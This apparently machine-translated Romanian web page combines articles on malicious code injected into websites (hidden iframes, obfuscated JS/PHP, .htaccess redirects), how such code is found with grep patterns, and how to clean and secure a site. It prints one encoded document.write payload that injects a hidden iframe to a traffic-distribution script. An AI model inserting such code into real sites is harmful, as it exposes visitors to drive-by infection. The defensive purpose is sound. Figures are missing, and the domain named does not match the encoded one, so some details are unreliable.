Pagina web rău intenționată. Ce este codul rău intenționat? Introducere. Crima cibernetică: tendințe și evoluții

• utilizatorii se plâng că site-ul web este blocat de browsere și/sau programe
• site-ul este inclus pe lista neagră de Google sau de altă bază de date cu adrese URL rău intenționate
• au avut loc schimbări majore în volumul traficului și/sau în clasamentul motoarelor de căutare
• site-ul web nu funcționează corect și afișează erori și avertismente
• După ce vizitez un site web, computerul meu se comportă ciudat.

Adesea, codul rău intenționat rămâne nedetectat pentru o lungă perioadă de timp, mai ales atunci când este infectat cu malware foarte complex. Un astfel de malware este, de obicei, foarte obscurcat pentru a păcăli atât administratorii site-urilor web, cât și programele antivirus; schimbă constant numele de domenii către care redirecționează utilizatorii, ocolind astfel listele negre. Dacă nu există niciunul dintre simptomele de mai sus, acesta este un bun indicator al curățeniei serverului dvs., deși, din păcate, nu 100%; prin urmare, rămâneți vigilenți pentru orice activitate suspectă.

Cel mai evident semn de infectare cu orice malware este prezența unui cod rău intenționat/suspect într-unul sau mai multe fișiere - în principal în format HTML, PHP sau JS, și de ceva timp și ASP/ASPX. Acest cod nu este ușor de găsit și necesită cel puțin programare de bază și dezvoltarea site-ului web. Pentru ca cititorul să înțeleagă mai bine cum arată codul rău intenționat, oferim câteva exemple de cea mai frecventă infecție a paginilor web.

Exemplul 1: redirecționare simplă

Cea mai veche și cea mai mare metoda simpla, folosit de infractorii cibernetici, este adaosul HTML simplu eticheta iframe în codul fișierelor HTML de pe server. Adresa folosită pentru a încărca site-ul web rău intenționat în IFrame este specificată ca atribut SRC; Atributul VIZIBILITATE cu valoarea „ascuns” face cadrul invizibil pentru utilizatorul care vizitează site-ul.

Figura 1: IFrame rău intenționat în codul HTML al site-ului web

O altă metodă de a executa un script rău intenționat în browserul utilizatorului este să injectați un link către acel script într-un fișier HTML ca atribut src în script sau etichete img:

Figura 2: Exemple de linkuri rău intenționate

În ultimul timp, au existat tot mai multe cazuri în care cod rău intenționat este generat dinamic și injectat în codul HTML folosind scripturi JS sau PHP rău intenționate. În astfel de cazuri, codul este vizibil numai în vizualizare cod sursă pagini din browser, dar nu în fișiere fizice pe server. Infractorii cibernetici pot defini în continuare condițiile în care ar trebui generat cod rău intenționat: de exemplu, numai atunci când un utilizator navighează la un site din anumite motoare de căutare sau deschide un site într-un anumit browser.

Pentru a înșela atât proprietarul site-ului web, cât și software-ul antivirus și pentru a îngreuna apariția codului rău intenționat, infractorii cibernetici folosesc o varietate de tehnici de înfundare a codului.

Exemplul 2: „Eroarea 404: Pagina nu a fost găsită”

În acest exemplu, codul rău intenționat este încorporat într-un șablon de mesaj care este afișat atunci când obiectul specificat nu a fost găsit pe server (cunoscuta „eroare 404”). În plus, un link către un element inexistent este injectat în fișierele index.html / index.php pentru a declanșa în tăcere această eroare de fiecare dată când utilizatorul vizitează pagina web infectată. Această metodă poate provoca o oarecare confuzie: persoana responsabilă pentru site-ul web primește un mesaj că o soluție antivirus a semnalat site-ul web ca infectat; după o verificare superficială, rezultă că a fost găsit cod rău intenționat într-un obiect care aparent nu există; aceasta duce la tentația de a presupune (în mod greșit) că a fost o alarmă falsă.

Figura 3. Trojan.JS.Iframe.zs - script rău intenționat în șablonul de mesaj de eroare 404

În acest caz particular, codul rău intenționat a fost ofuscat. După deofuzare, putem vedea că scopul scriptului este de a injecta o etichetă IFRAME care va fi folosită pentru a redirecționa utilizatorii către o adresă URL rău intenționată.

Figura 4. Trojan.JS.Iframe.zs - cod rău intenționat după deofuzare

Exemplul 3: injectarea selectivă de cod rău intenționat

Cod similar poate fi generat și atașat dinamic (adică, în funcție de condițiile specifice) la toate fișierele HTML aflate pe server, folosind un script PHP rău intenționat încărcat pe același server. Scriptul prezentat în exemplul următor verifică parametrul UserAgent (care este trimis de browserul utilizatorului, precum și de boții de căutare) și nu adaugă cod rău intenționat dacă site-ul este accesat cu crawlere de un bot sau dacă vizitatorii site-ului folosesc browsere Opera sau Safari . În acest fel, utilizatorii browserelor care nu sunt vulnerabili la exploitul specific utilizat pentru atac nu vor fi redirecționați către acel exploit. De asemenea, este de remarcat faptul că comentariile din cod sunt în mod deliberat înșelătoare, sugerând că acest script are ceva de-a face cu statisticile botului.

Figura 5. Trojan.PHP.Iframer.e - cod care infectează un script PHP

Această tehnică poate fi folosită și în sens invers: infractorii cibernetici pot injecta link-uri care conduc la conținut ilegal, dubios sau rău intenționat (spam, spyware, software, resurse de phishing) numai dacă site-ul este vizitat de un robot crawler. Scopul unui astfel de atac este așa-numita optimizare neagră - un mecanism de ridicare a poziției unei resurse criminale cibernetice în rezultatele căutării. Acest tip de malware vizează de obicei portaluri web populare cu clasamente ridicate și este destul de dificil de detectat, deoarece codul rău intenționat nu este niciodată afișat utilizatorului obișnuit. Drept urmare, site-urile web rău intenționate primesc clasamente înalte în motoarele de căutare și apar în partea de sus a rezultatelor căutării.

Exemplul 4: ofuscarea inteligentă

Infectarea scripturilor PHP poate lua și alte forme. Mai jos sunt două exemple descoperite cu câteva luni în urmă.

Figura 6. Trojan-Downloader.PHP.KScript.a - infectează scriptul PHP

Fig 12. Trojan-Downloader.JS.Twetti.t - cod rău injectat în fișierele JS

În sfârșit, există un caz cunoscut infecție în masă programe malware care utilizează nume aleatorii de domenii. Dacă sunteți infectat cu acest program malware, este posibil să găsiți următorul cod pe site-ul dvs. web:

Fig 13. Versiune ofuscata a codului care redirecționează către un domeniu generat aleatoriu

Exemplul 6: „gootkit” și ofuscarea întregului fișier

Codul rău intenționat ascuns este ușor de detectat printre alte coduri cod curat, și de aceea infractorii cibernetici au venit recent cu ideea de a ofusca întregul conținut al unui fișier, făcând astfel imposibil de citit atât codul încorporat, cât și cel legitim. Este imposibil să separați codul legitim de codul rău intenționat și un fișier poate fi dezinfectat numai după ce a fost decriptat.

Orez. 14. Fișier ofuscat de malware-ul „gootkit”.

A scăpa de primul nivel de ofuscare nu este dificil, pentru a face asta trebuie doar să schimbi funcția de evaluare() pentru a alert() - sau print() în cazul consolei - și lansați-l pentru execuție. Al doilea nivel este ceva mai complicat: în acest caz nume de domeniu folosit ca cheie pentru a cripta codul.

Orez. 15: „gootkit” - al doilea nivel de ofuscare

După decriptare, puteți vedea codul rău intenționat după conținutul original al fișierului:

Orez. 16: „gootkit” - cod deobfuscat

Uneori, partea rău intenționată se dovedește a fi o a doua versiune a malware-ului discutat în exemplul anterior și este folosită pentru a genera un nume de domeniu pseudo-aleatoriu pentru redirecționare.

Exemplul 7: .htaccess

În loc să infecteze scripturile și codul HTML, infractorii cibernetici pot folosi capacitățile anumitor fișiere, cum ar fi .htaccess. În astfel de fișiere, administratorul poate defini drepturi de acces la anumite foldere de pe server și, de asemenea, în anumite circumstanțe, poate redirecționa utilizatorii către alte adrese URL (de exemplu, dacă utilizatorul accesează dintr-un browser). dispozitiv mobil, se redirecționează către versiunea mobilă site-ul web). Nu este greu de ghicit cum folosesc infractorii cibernetici această funcționalitate...

Orez. 17: malicious.htaccess

În exemplul de mai sus, toți utilizatorii care ajung pe acest site făcând clic pe un link din majoritatea motoarelor de căutare majore (parametrul HTTP_REFERER) sunt redirecționați către o adresă URL rău intenționată. În plus, acest fișier .htaccess definește un număr destul de mare de browsere și roboți pentru care nu se efectuează redirecționarea (parametrul HTTP_USER_AGENT). De asemenea, redirecționarea nu are loc dacă pagina web este citită din cache (referer == cache) sau descărcată din nou de pe același computer (parametru cookie).

Un astfel de malware permite, de asemenea, infecții mai selective - de exemplu, anumite adrese IP pot fi excluse și atunci când vizualizați site-uri web dintr-o anumită gamă de adrese IP - de exemplu, cele aparținând unei companii securitatea informatiei- nu sunt generate rezultate rău intenționate.

Vectorii de atac și tehnologiile de infecție

Indiferent de tehnologia utilizată, infractorii cibernetici trebuie să găsească o metodă de livrare fișiere rău intenționate la server sau modificări ale fișierelor deja existente pe server. Cea mai primitivă metodă de a obține acces la server este de a sparge parola de acces. Pentru a face acest lucru, infractorii cibernetici pot folosi așa-numitul atac de forță brută sau versiunea sa limitată - un atac de forță brută (atac de dicționar). Această tactică necesită de obicei o cantitate mare de timp și resurse, așa că este rar folosită pentru infecțiile în masă ale site-urilor web. Scenariile mai populare includ exploatarea vulnerabilităților și programele malware de furt de parole.

Exploatarea vulnerabilităților sistemului de management al conținutului/sistemului de comerț electronic

Majoritatea platformelor moderne de gestionare a conținutului web (cum ar fi sistemele de management al conținutului (CMS), comerțul electronic, panourile de control etc.) nu sunt perfecte și au vulnerabilități care permit altora să încarce fișiere pe server fără autentificare. Și deși dezvoltatorii caută în mod constant astfel de vulnerabilități, lansarea patch-urilor necesită mult timp; În plus, mulți utilizatori continuă să folosească versiuni vechi de programe cu un număr mare de erori. Cel mai adesea, vulnerabilitățile se găsesc, firesc, în cele mai populare platforme, precum WordPress, Joomla și osCommerce.

Un exemplu binecunoscut al unei astfel de vulnerabilități este TimThumb, care a fost utilizat pe scară largă de infractorii cibernetici într-o varietate de scenarii de descărcare drive-by. TimThumb este un modul PHP pentru redimensionarea imaginilor și crearea așa-numitelor miniaturi grafice, incluse în majoritatea șabloanelor CMS găsite în acces deschis. Vulnerabilitatea permite ca fișierele aflate pe o mașină la distanță să fie scrise pe server în directorul cache. Un alt exemplu este vulnerabilitatea de injectare SQL din Plesk Panel (versiunile 10 și mai vechi), descoperită în februarie 2012, care vă permite să citiți baze de date și să furați parole, care – până de curând – erau stocate în mod explicit. Datele de înregistrare astfel obținute au fost probabil folosite în recenta epidemie masivă web http://www.securelist.com/en/blog/208193624/Who_is_attacking_me; https://www.securelist.com/ru/blog/208193713/RunForestRun_gootkit_i_generirovanie_sluchaynykh_domennykh_imen.

Utilizarea programelor spion pentru a fura acreditările serverului FTP

În cele mai frecvente infecții web (de exemplu, Gumblar și Pegel), o altă metodă a avut succes. În prima etapă, infractorii cibernetici distribuie programe malware concepute special pentru a găsi și a fura nume de utilizator și parole pentru conturile FTP, verificând setările clienților FTP sau scanând trafic de rețea. După ce malware-ul găsește aceste date de înregistrare pe computerul infectat al administratorului site-ului, programul stabilește o conexiune la serverul FTP și descarcă scripturi rău intenționate sau scrie versiuni infectate în locul fișierelor originale. Este de la sine înțeles că atâta timp cât computerul proprietarului contului este infectat, fișierele stocate pe server vor fi infectate din nou și din nou, chiar și după modificarea informațiilor de conectare și restaurarea întregului conținut dintr-o copie de rezervă curată.

Obiectivele infractorilor cibernetici

Care este scopul infectării site-urilor web?

• redirecționarea utilizatorilor către exploit-uri pentru a instala în tăcere malware pe computerele lor;
• redirecționarea utilizatorilor către spam, phishing și alt conținut rău intenționat, ilegal sau nedorit;
• interceptarea/furtul vizitelor la fața locului / interogări de căutare.
• promovarea site-urilor web rău intenționate/ilegale și a site-urilor web care conțin spam (optimizare black hat);
• utilizarea resurselor serverului pentru activități ilegale.

De fapt, nu este nimic nou aici: atunci când infractorii cibernetici infectează site-uri web, aceștia sunt conduși de dorința de a obține profituri indirecte.

Metode de eliminare a codului rău intenționat

Ce să faci dacă site-ul tău este atacat de hackeri?

În primul rând, dacă aveți simptome care indică o posibilă infecție, ar trebui să dezactivați imediat site-ul web până când problema este rezolvată. Acest lucru este cu adevărat extrem de important, deoarece fiecare moment de întârziere joacă în mâinile infractorilor cibernetici, permițându-le să infecteze mai multe mai multe calculatoareși răspândește infecția peste tot. Ar trebui să verificați jurnalele serverului pentru activități suspecte, cum ar fi solicitări ciudate de la adrese IP situate în țări care nu sunt tipice pentru vizitatorii site-ului etc. - acest lucru poate fi util pentru detectarea fișierelor infectate și determinarea exactă a modului în care infractorii cibernetici au obținut acces la server.

Dar cum să faci față codului rău intenționat?

Backup

Cel mai rapid și mod de încredere restaurarea întregului conținut al serverului - folosind o copie de rezervă curată. Pentru a face acest lucru eficient, este, de asemenea, necesar să reinstalați complet software-ul care rulează pe server (sisteme de gestionare a conținutului / CMF, sisteme de comerț electronic etc.). Desigur, pentru aceasta este necesar să folosiți cele mai recente, pe deplin versiuni actualizate. După acești pași, pe server nu ar trebui să rămână fișiere infectate - cu condiția să ștergeți tot conținutul înainte de restaurare și să fi fost creată o copie de rezervă înainte de începerea atacului.

Verificare automată

Dacă nu există o copie de rezervă curată, nu ai de ales decât să începi să lupți împotriva programelor malware. Din fericire, există un număr solutii automate, care vă va ajuta să găsiți cod rău intenționat - inclusiv produse antivirus și scanere de site-uri online, cum ar fi http://sucuri.net/. Niciuna dintre ele nu este perfectă, dar în cazul malware-ului cunoscut/obișnuit, toate pot fi destul de utile. Pentru început, puteți verifica un site web folosind mai multe scanere online. Unele dintre ele nu numai că vor determina dacă site-ul dvs. este efectiv infectat, dar vor indica și codul rău intenționat în fișierele dvs. Apoi puteți efectua o scanare antivirus completă a tuturor fișierelor de pe server.

Dacă sunteți proprietarul serverului sau dacă serverul rulează o soluție de securitate pe care aveți permisiunea de a o folosi, puteți efectua verificarea pe partea serverului. Asigurați-vă că creați o copie a fișierelor dvs., deoarece unele scanere antivirus nu dezinfectează fișierele infectate, ci le șterg! De asemenea, puteți încărca conținutul serverului dvs calculator localși verificați-l folosind soluție antivirus Pentru computer desktop. A doua opțiune este de preferat, deoarece cele mai moderne programe antivirus pentru computerele desktop există un modul euristic bine dezvoltat. Programele malware care infectează site-urile web sunt foarte polimorfe: în timp ce analiza semnăturilor este practic inutilă în combaterea acesteia, euristica facilitează detectarea acestora.

Îndepărtarea manuală

Dacă verificare automată nu a dat niciun rezultat și mesajele despre infectarea site-ului dvs. sunt încă primite, singura modalitate de a scăpa de malware este să-l găsiți manual și să eliminați tot codul rău intenționat. Această sarcină dificilă poate dura o perioadă semnificativă de timp, deoarece este necesar să verificați fiecare fișier - fie HTML, JS, PHP sau fișier de configurare - pentru scripturi rău intenționate. Exemplele de mai sus sunt doar un mic eșantion din varietatea de programe malware pe site, așa că există șanse mari ca codul rău intenționat de pe site-ul dvs. să fie parțial sau complet diferit de aceste mostre. Cu toate acestea, majoritatea malware-urilor moderne de site-uri web au unele caracteristici comune, iar aceste trăsături vor ajuta la identificarea problemei.

Mai presus de toate, trebuie să acordați atenție acelor părți ale codului care par neclare sau imposibil de citit. Obfuscarea codului, o tehnologie folosită adesea de , este destul de neobișnuită pentru orice alt software legat de site-ul web. Dacă nu ați obscucat codul singur, aveți toate motivele să fiți suspicios în privința acestuia. Dar aveți grijă - nu tot codul obscurcat va fi rău intenționat!

De asemenea, nu orice script rău intenționat este obscurcat, așa că este logic să căutați etichete IFRAME explicite și alte link-uri către resurse externe în toate fișierele dvs. Unele dintre ele pot fi legate de reclameși statistici, dar nu vă îndrăgiți de adrese URL special create, care pot fi confuze atunci când par a fi adrese ale unor portaluri cunoscute și de încredere. Nu uitați să verificați codul pentru mesajele de eroare ale șablonului, precum și toate fișierele .htaccess.

Instrumentele utile pentru căutarea codului rău intenționat pe un server sunt, fără îndoială, grep and find - utilitare care funcționează în linie de comandă, inclus în mod implicit pe aproape toate sistemele bazate pe Unix. Mai jos sunt exemple de utilizare a acestora în diagnosticarea celor mai frecvente infecții:

grep -iRs „iframe” *
grep -iRs „eval” *
grep -iRs „unescape” *
grep -iRs „base64_decode” *
grep -iRs „var div_colors” *
grep -iRs „var _0x” *
grep -iRs „CoreLibrariesHandler” *
grep -iRs „pingnow” *
grep -iRs „searchbot” *
grep -iRs „km0ae9gr6m” *
grep -iRs „c3284d” *
găsi . -iname „upd.php”
găsi . -iname „*timthumb*”

Descrierea grep (din manualul Linux): tipăriți linii care se potrivesc cu modelul; opțiunea -i înseamnă ignora majuscule; -R înseamnă căutare recursivă și -s împiedică afișarea mesajelor de eroare. Prima dintre comenzile enumerate caută etichete IFRAME în fișiere; ceilalți trei caută semnele cele mai evidente de ofuscare; restul caută șiruri specifice asociate cu cele mai mari infecții cunoscute de site-uri web.

În ceea ce privește găsirea, manualul Linux precizează: căutarea fișierelor într-o structură de foldere ierarhice; "." (punctul) indică către directorul curent (deci aceste comenzi ar trebui să fie rulate din directorul rădăcină sau directorul principal de pe server), parametrul -iname specifică fișierul de căutat. Poate fi folosit expresii regulate pentru a căuta toate fișierele care îndeplinesc anumite criterii.

Desigur, trebuie să știți întotdeauna ce să căutați - nu toate rezultatele vor indica o infecție. Este o idee bună să verificați părțile suspecte ale codului scaner antivirus sau încercați să le căutați pe google. Este foarte probabil să găsiți niște răspunsuri - atât pentru cod rău intenționat, cât și pentru codul curat. Dacă încă nu sunteți sigur dacă un fișier este infectat, cel mai bine este să dezactivați site-ul web (pentru orice eventualitate) și să solicitați sfatul unui profesionist înainte de a lua orice măsură.

Foarte important!

Pe lângă curățarea fișierelor de pe server, este necesar să se efectueze o scanare antivirus completă a tuturor computerelor utilizate pentru a încărca și gestiona conținutul de pe server și a modifica toate datele de acces la toate conturile de pe server (FTP, SSH, panouri de control). , etc.) pe care le intretineti .

Bazele securității site-ului web

Din păcate, în cele mai multe cazuri, eliminarea codului rău intenționat nu este suficientă pentru a scăpa de infecție o dată pentru totdeauna. Dacă site-ul dvs. web este infectat, acest lucru poate indica existența unor vulnerabilități care au permis infractorilor cibernetici să injecteze scripturi rău intenționate în server; iar dacă lăsați această problemă nesupravegheată, vă veți confrunta cu noi infecții în viitorul apropiat. Pentru a preveni acest lucru, trebuie să luați măsuri adecvate pentru a proteja serverul și computerul/calculatoarele utilizate pentru administrarea serverului.

• Folosiți parole puternice. Deși acest sfat poate suna banal, este cu adevărat fundamentul securității serverului. Nu este necesar doar schimbarea parolelor după fiecare incident și/sau atac asupra serverului - acestea trebuie schimbate în mod regulat, de exemplu lunar. Parolă bună trebuie să îndeplinească criterii speciale, care pot fi găsite la www.kaspersky.com/passwords ;
• Actualizare regulată. De asemenea, este necesar să nu uitați de actualizările regulate. Infractorii cibernetici exploatează adesea vulnerabilitățile software, indiferent de ținta malware-ului - indiferent dacă acesta vizează utilizatorii de computere sau site-uri web. Toate programele cu care vă gestionați conținutul serverului / site-ului ar trebui să fie cel mai mult ultimele versiuni, iar fiecare actualizare de securitate trebuie instalată imediat ce este lansată. Utilizare versiunile actuale Software-ul și instalarea în timp util a tuturor patch-urilor necesare vor ajuta la reducerea riscului de atac folosind exploit-uri. O listă actualizată în mod regulat a vulnerabilităților cunoscute poate fi găsită la http://cve.mitre.org/;
• Backup-uri regulate. Având în stoc o copie curată a conținutului serverului, vă va economisi mult timp și efort, ca să nu mai vorbim de proaspăt copii de rezervă poate fi, pe lângă tratarea infecției, foarte utilă în rezolvarea altor probleme;
• Verificarea periodică a fișierelor. Chiar și în absența simptomelor evidente de infecție, se recomandă scanarea periodică a tuturor fișierelor de pe server pentru a identifica codul rău intenționat;
• Asigurarea securității PC-ului. Deoarece o cantitate semnificativă de programe malware de site-uri web este răspândită prin computerele infectate, securitatea computerului desktop utilizat pentru a vă gestiona site-ul web este o prioritate ridicată pentru securitatea site-ului. Menținerea continuă a computerului curat și securizat crește foarte mult probabilitatea ca site-ul dvs. web să fie, de asemenea, sigur și fără viruși.
• Următoarele acțiuni ar trebui să fie obligatorii (dar nu suficiente):
  • eliminarea programelor neutilizate;
  • dezactivarea serviciilor și modulelor inutile;
  • stabilirea de politici adecvate pentru utilizatori individuali și grupuri de utilizatori;
  • stabilirea unor drepturi de acces adecvate la anumite fișiereși directoare;
  • dezactivarea afișării fișierelor și directoarelor serverului web;
  • menținerea jurnalelor de evenimente care sunt verificate în mod regulat pentru activități suspecte;
  • utilizarea de criptare și protocoale securizate.

Programele malware concepute pentru a infecta site-urile web pot fi un coșmar pentru administratorii web și utilizatorii de internet. Criminalii cibernetici își dezvoltă în mod constant tehnologia, descoperind noi exploatări. Programele malware se răspândesc rapid pe internet, afectând serverele și stațiile de lucru. Este corect să spunem că nu există o modalitate fiabilă de a elimina complet această amenințare. Cu toate acestea, fiecare proprietar de site web și fiecare utilizator de internet poate face internetul mai sigur respectând regulile de securitate de bază și păstrându-și site-urile web și computerele în siguranță și curate în orice moment.

Lasă comentariul tău!

Categorie: .

Acest articol se adresează utilizatorilor și proprietarilor de internet resurse informaționale. Scopul articolului este de a descrie metode de infectare a site-urilor web cu cod rău intenționat, consecințe posibile De aici provin metodele de combatere a malware-ului.

Ce este acest cod rău intenționat, de unde vine și cât de periculos este?

Codul rău intenționat este un link către o resursă care conține software rău intenționat. Cele mai comune astăzi sunt fie un antivirus fals (Fake Antivirus), fie un modul pentru înlocuirea interogărilor de căutare, fie un software pentru trimiterea de spam. În unele cazuri, malware-ul poate combina funcțiile de furt de date confidențiale de pe computerul utilizatorului, de exemplu, acestea pot fi parole de la interfețele administrative pentru gestionarea site-urilor web, parole pentru ftp, conturi pentru servicii online.

1) Legătura rău intenționată duce la sistemul de distribuție a traficului (TDS). Sistemul de distribuție a traficului vă permite să redirecționați vizitatorul, în funcție de țară, sistem de operare, browser, limba folosită și alte detalii, către diverse resurse. Aceste resurse, la rândul lor, conțin malware special pentru acest public sau acest software vulnerabil. Mai mult decât atât, dacă urmați un link rău intenționat de la un browser sau o versiune de sistem de operare neintenționată de atacator, veți vedea fie doar un ecran gol, fie, de exemplu, pagina de căutare Google. Acest lucru face malware-ul puțin dificil de identificat. Cu toate acestea, cu o analiză atentă, puteți înțelege logica sistemului și vă puteți proteja de infecție.
2) Link-ul rău intenționat duce la „sploits” pentru browserele populare și produse software. „Sploits” sunt coduri special concepute care folosesc vulnerabilitățile din software pentru a descărca și executa în tăcere malware pe computerul utilizatorului. În acest caz, software-ul utilizatorului este detectat și, dacă este vulnerabil, apare infecția.

Pentru a ascunde prezența unui cod rău intenționat pe un site web, acesta este criptat, dar există și cazuri de cod deschis.

Exemplu de link rău intenționat criptat: document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A %2F %2F%74%6E%78%2E%6E%61%6D%65%2F%69%6E%2E%63%67%69%3F%33%27%20%77%69%64%74 %68 %3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76 %69 %73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72 %61 %6D%65%3E'));

Să facem o mică analiză a structurii link-ului rău intenționat:
nume de domeniu - bestlotron.cn
script - in.cgi (sistem de distribuție a traficului SUTRA)
schema - cocacola51

Linkuri rău intenționate care redirecționează către sistemul de distribuție a traficului în în ultima vreme sunt cele mai frecvente. În acest caz, un atacator, care a obținut acces la un site web și a introdus un link rău intenționat către sistemul de distribuție a traficului pe resursa sa, poate controla traficul de pe acest site web. Schema „cocacola51” prezentată în exemplu poate conține mai multe programe malware. Astfel, sistemul de distribuție a traficului este doar un intermediar între vizitatorul site-ului piratat și malware-ul atacatorului.

Al doilea exemplu demonstrează în mod clar o legătură rău intenționată criptată. Folosit de obicei pentru criptare algoritmi simpli iar în aproape 99% din cazuri astfel de legături pot fi descifrate cu ușurință.

După decriptare obținem următorul cod:

Acum putem observa atât adresa site-ului, cât și scriptul sistemului de distribuție a traficului cu schema 3, familiară nouă din primul exemplu.

De unde provine acest cod de pe site-uri web și cum poate fi periculos?
De regulă, site-urile web nu mai sunt piratate manual. Totul a fost automatizat de mult. În aceste scopuri, hackerii au scris multe, cum ar fi programe de aplicație, și aplicații server. Cel mai comun proces de injectare automată a link-urilor rău intenționate în site-uri web este furtul parole ftpși prelucrarea ulterioară a acestor date de către o aplicație specializată Iframer. Lucrarea Iframer este simplă - conectați-vă la resurse folosind o listă de conturi FTP, găsiți fișiere folosind o mască dată, de regulă, acestea sunt fișiere ale paginilor de index ale site-ului și injectați cod rău intenționat în ele. Prin urmare, după ce codul este eliminat, multe site-uri web sunt infectate din nou, chiar dacă toate parolele de acces sunt modificate, inclusiv cele pentru ftp. Motivul pentru aceasta poate fi prezența unui virus care fură parola pe computerul de pe care este administrat site-ul web.

Există cazuri în care proprietarii de site-uri web pe care apare cod rău intenționat nu iau în serios această problemă. Sunt de acord, vătămarea resursei în sine acest cod nu provoacă. Doar vizitatorii site-ului web infectat suferă. Dar sunt și alte aspecte asupra cărora vreau să atrag atenția.

Un site web care conține cod rău intenționat ajunge mai devreme sau mai târziu în diverse baze de date cu purtători de infecții - Lista de site-uri malware, precum și în motoarele de căutare precum Google sau Yandex, care pot marca un site web infectat ca potențial periculos. Va fi extrem de dificil să vă eliminați resursa dintr-o astfel de bază odată ce ajunge acolo. De asemenea, este posibil ca mai devreme sau mai târziu să primiți un „abuz” - o plângere de la vizitatorii site-ului. În acest caz, există posibilitatea ca atât numele de domeniu al site-ului web să fie blocat, cât și adresa IP a acestuia. Au existat cazuri când întregi subrețele au fost blocate din cauza unui site web infectat.

Cum să te protejezi de apariția codurilor rău intenționate pe resursele tale? Pentru a face acest lucru, este necesar să îndepliniți o serie de cerințe de securitate a informațiilor:

1) Instalați software antivirus pe computerul de lucru de pe care este administrat site-ul, de preferință software licențiat cu baze de date actualizate zilnic.
2) Instalați și configurați un firewall în așa fel încât să fie verificat tot traficul atunci când lucrați cu rețeaua și, în cazul accesului la gazde suspecte, să fie posibil să îl blocați.
3) Utilizare parole complexe pentru interfețe administrative și acces la serviciile ftp și ssh.
4) Nu salvați parolele în Total Commander, Far și alte programe manageri de fișiere. De regulă, aproape toate programele troiene știu deja cum să captureze aceste date și să le transmită atacatorului.
5) Nu deschideți și nu rulați software-ul primit e-mail sau fișiere descărcate de pe Internet fără a le verifica mai întâi cu un software antivirus.
6) Actualizați software-ul instalat pe computer. Instalați patch-urile în timp util sisteme de operareși actualizați software-ul aplicației. Uneori, programele pe care le utilizați în fiecare zi pot servi ca o gaură în sistem pentru ca malware-ul să pătrundă. În special Adobe Acrobat Cititor, Flash Player, programe din pachetul MS Office etc.

Dacă urmați toate măsurile de protecție descrise mai sus, dar găsiți cod rău intenționat pe resursa dvs., furnizorul de găzduire, sau mai exact setările serverului pe care este găzduită resursa dvs., ar putea fi și el de vină. În acest caz, trebuie să contactați echipa de asistență a furnizorului dvs. de găzduire și să le cereți să identifice și să elimine cauza incidentului.

După cum știți, în Uzbekistan, în septembrie 2005, prin decret al președintelui țării, a fost creat Serviciul de răspuns la incidente informatice UZ-CERT. Pe lângă sarcinile lor principale, specialiștii Service efectuează și activități de detectare a codurilor rău intenționate pe site-urile web din zona de domeniu național. În aceste scopuri, au fost scrise o serie de programe de aplicație pentru a automatiza punctele principale, dar, desigur, scanarea manuală a site-urilor web suspecte de infecție joacă, de asemenea, un rol important. Uneori, codul rău intenționat deghizat cu succes care a fost supus „ofucării” - o modificare a structurii codului - nu poate fi detectat prin mijloace automate. Informațiile despre toate site-urile web infectate detectate sunt publicate pe site-ul Serviciului, precum și în secțiunea UZ-CERT de pe uForum.uz. Proprietarii de resurse infectate primesc alerte, sfaturi și asistență pentru a elimina amenințările și pentru a-și proteja în continuare sistemele. Sperăm din tot sufletul că această lucrare avantajează utilizatorii de internet și ajută la evitarea infecțiilor în masă calculatoare personale malware.

În Odnoklassniki

Pe site a apărut un virus și, ca orice obiect infectat, resursa dvs. web s-a transformat într-o mare sursă de probleme: acum nu numai că nu aduce profit, ci și discreditează reputația dvs. pe Internet, cumpărători, motoarele de căutare și chiar și gazda se îndepărtează de tine.

Rămâneți singur cu problema voastră și încercați să o rezolvați pe cont propriu, fără a apela la profesioniști, ci urmând sfaturile „experților” de pe forumuri. Sau comandați tratament de pe un site web unde este „mai ieftin”. Ce poti face, pentru ca intotdeauna vrei sa rezolvi problema cat mai repede si la cel mai mic cost. Dar este această abordare întotdeauna justificată?

Vă prezentăm atenției TOP 7 greșeli ale anului trecut pe care webmasterii le-au făcut când au încercat să restabilească funcționalitatea site-ului după piratare și infecție.

Greșeala #1. Restaurarea unui site web dintr-o copie de rezervă ca o modalitate de a scăpa de codul rău intenționat

Foarte des, webmasterii încearcă să rezolve problema ca un site să fie infectat cu cod rău intenționat, derulând site-ul înapoi la cea mai recentă versiune curată. Și continuă să restaureze proiectul web de fiecare dată când un virus de pe site se face simțit din nou. Din păcate, aceasta este o opțiune incomodă și foarte riscantă.

Decizie corectă: site-ul trebuie tratat și protejat de hacking pentru a evita reinfectarea. În primul rând, conținutul site-ului poate fi actualizat, pot fi instalate noi plugin-uri pe site și pot fi aduse modificări la scripturile site-ului. Fiecare rollback înseamnă că pierzi rezultatele muncii din ultimele zile. Dar există un motiv mai important pentru combaterea radicală a hacking-ului: ce se întâmplă dacă un hacker decide într-o zi să-ți distrugă complet site-ul, pentru că are acces la resursa ta web?

Greșeala #2. Înșelăciune a motorului de căutare pentru a scoate site-ul de la sancțiuni

Site-ul este inclus în lista „amenințărilor la adresa securității unui computer sau dispozitiv mobil...” din cauza unui virus de pe site sau a unei redirecționări a vizitatorilor către o resursă infectată. Panoul webmaster afișează exemple de pagini infectate, dar un webmaster viclean sau ignorant, în loc să rezolve problema (căutarea și eliminarea sursei codului rău intenționat), șterge unele pagini pe care motoarele de căutare le arată în exemple de infecție. Sau, opțional, blochează complet accesul la site folosind regulile din robots.txt, crezând naiv că acest lucru va bloca și accesul botului antivirus la site.

Soluția corectă: trebuie să găsiți codul virusului pe site și să îl eliminați. Interzicerea indexării este nu numai inutilă, ci și periculoasă. În primul rând, paginile site-ului pot cădea din indexul de căutare. Ei bine, și în al doilea rând, robotul serviciului antivirus funcționează după reguli diferite de regulile motorului de căutare, iar interdicția de indexare nu îl afectează în niciun fel.

Greșeala #3. Utilizarea unui scanner de malware de către specialiști incompetenți

Pentru a economisi bani sau din alte motive, începe să trateze site-ul un specialist insuficient pregătit, care nu poate determina 100% dacă fragmentul evidențiat de scanerul de coduri rău intenționate este cu adevărat periculos. Ca urmare, pot fi observate două extreme: absolut toate suspiciunile de virus sunt eliminate, ceea ce duce la o defecțiune a site-ului sau codul rău intenționat nu este complet eliminat, ceea ce provoacă o recidivă.

